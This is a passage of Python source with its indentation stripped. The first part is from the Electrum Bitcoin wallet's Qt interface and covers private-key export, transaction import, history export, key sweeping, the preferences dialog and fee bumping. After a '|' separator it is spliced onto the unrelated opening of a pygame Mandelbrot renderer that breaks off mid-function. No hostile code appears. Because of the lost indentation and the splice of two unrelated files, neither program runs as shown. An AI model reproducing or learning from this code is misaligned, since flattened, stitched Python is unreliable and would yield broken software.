b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
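        # Offline-signed transactions are carried in QR codes as base43 text, so
        # decode with base 43 before parsing.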
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
from electrum.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electrum.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
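        # privkeys_thread runs in the background; `done` lets a rejected dialog stop
        # the export early, and progress/results are pushed back via the two signals.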
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
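    # Illustrative output layout (placeholders, not real keys): the CSV variant has
    # a header row "address,private_key" followed by one "<address>,<private key>"
    # row per address; the non-CSV variant is a JSON object mapping address -> key.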
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
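        # Each history item unpacks to (tx_hash, height, confirmations, timestamp,
        # value, balance); exported rows keep hash, label, confirmations, value, time.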
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
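        # sweep_preparations() looks up the UTXOs controlled by the entered keys;
        # the coins are then spent in full ("max") to the chosen wallet address.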
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
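        # Each (label, widget) pair appended to these lists becomes one row of the
        # matching Preferences tab; a None widget lets the first item span both columns.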
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
            index = list(languages.keys()).index(self.config.get("language", ''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
rbf_policy = self.config.get('rbf_policy', 1)
rbf_label = HelpLabel(_('Propose Replace-By-Fee') + ':', '')
rbf_combo = QComboBox()
rbf_combo.addItems([_('Always'), _('If the fee is low'), _('Never')])
rbf_combo.setCurrentIndex(rbf_policy)
def on_rbf(x):
self.config.set_key('rbf_policy', x)
rbf_combo.currentIndexChanged.connect(on_rbf)
fee_widgets.append((rbf_label, rbf_combo))
self.fee_unit = self.config.get('fee_unit', 0)
fee_unit_label = HelpLabel(_('Fee Unit') + ':', '')
fee_unit_combo = QComboBox()
fee_unit_combo.addItems([_('sat/byte'), _('mBTC/kB')])
fee_unit_combo.setCurrentIndex(self.fee_unit)
def on_fee_unit(x):
self.fee_unit = x
self.config.set_key('fee_unit', x)
self.fee_slider.update()
fee_unit_combo.currentIndexChanged.connect(on_fee_unit)
fee_widgets.append((fee_unit_label, fee_unit_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['BTC', 'mBTC', 'bits']
        msg = _('Base unit of your wallet.')\
              + '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits.\n' \
              + _('These settings affect the amount fields in the Send tab.')
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BTC':
self.decimal_point = 8
elif unit_result == 'mBTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
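# Suggested fee = configured rate per kB scaled by the combined parent+child
# size; e.g. a rate of 10000 per kB and a 300-byte total suggests a fee of
# 3000 (illustrative numbers only, not taken from the original code).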
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
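# Pre-fill the editor with 1.5x the current fee as a starting suggestion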
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
__main__.py
|
from multiprocessing import Process
from numba import jit
import os, sys
import math
import time
# Initialises Pygame graphics library and hides debugging output
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
os.environ['SDL_VIDEO_CENTERED'] = '0'
pygame.display.init()
pygame.font.init()
refresh_Rate = pygame.time.Clock()
@jit
def calcMandelbrotPoint(x,y):
z = 0 + 0*1j
c = x + y*1j
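# Escape-time iteration: repeatedly apply z -> z**2 + c; if |z| ever exceeds
# 2 (tested as |z|**2 > 4 to avoid a square root) the point escapes and is
# coloured by how quickly it did so, while points that survive `precision`
# iterations are treated as inside the set and drawn black.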
if (show_Axis == True):
# draws a white line for each axis if configured
if x == (0 + x_Offset) or y == (0 - y_Offset):
return (255,255,255)
times_Looped = 0
for i in range(precision):
if (z.real ** 2) + (z.imag ** 2) > 4:
break
z = (z**2) + c
times_Looped += 1
# Return the color of the point
if times_Looped != precision:
return (int(255 * (1 - math.cos(0.5 * times_Looped)) / 2), int(255 * (1 - math.cos(0.25 * times_Looped)) / 2), int(255 * (1 - math.sin(0 * times_Looped)) / 2))  # cast to integer RGB values
else:
return (0,0,0)
def calculateSector(pixel_Array,sectorMap,sector_X,sector_Y):
# Loops over the pixels in this sector, writing each point's colour into the pixel array
for y in range(sectorMap[1][sector_Y][0],sectorMap[1][sector_Y][1]):
if (sector_X == 1 and sector_Y == 2 and y % 2 == 0):
pygame.display.update()
for x in range(sectorMap[0][sector_X][0],sectorMap[0][sector_X][1]):
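# Map the pixel to a point on the complex plane: the visible window spans
# 3/zoom units, shifted by the configured offsets; screen y grows downward,
# so a larger y maps to a larger imaginary component here.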
pixel_Array[x][y] = calcMandelbrotPoint((((x - (window_Width/2))/window_Width) * 3 / zoom) + x_Offset,(((y - (window_Height/2))/window_Height) * 3 / zoom) - y_Offset)
def render_MandelbrotSet():
# Create a 2D pixel array with one entry per pixel on the screen
pixel_Array = pygame.PixelArray(screen)
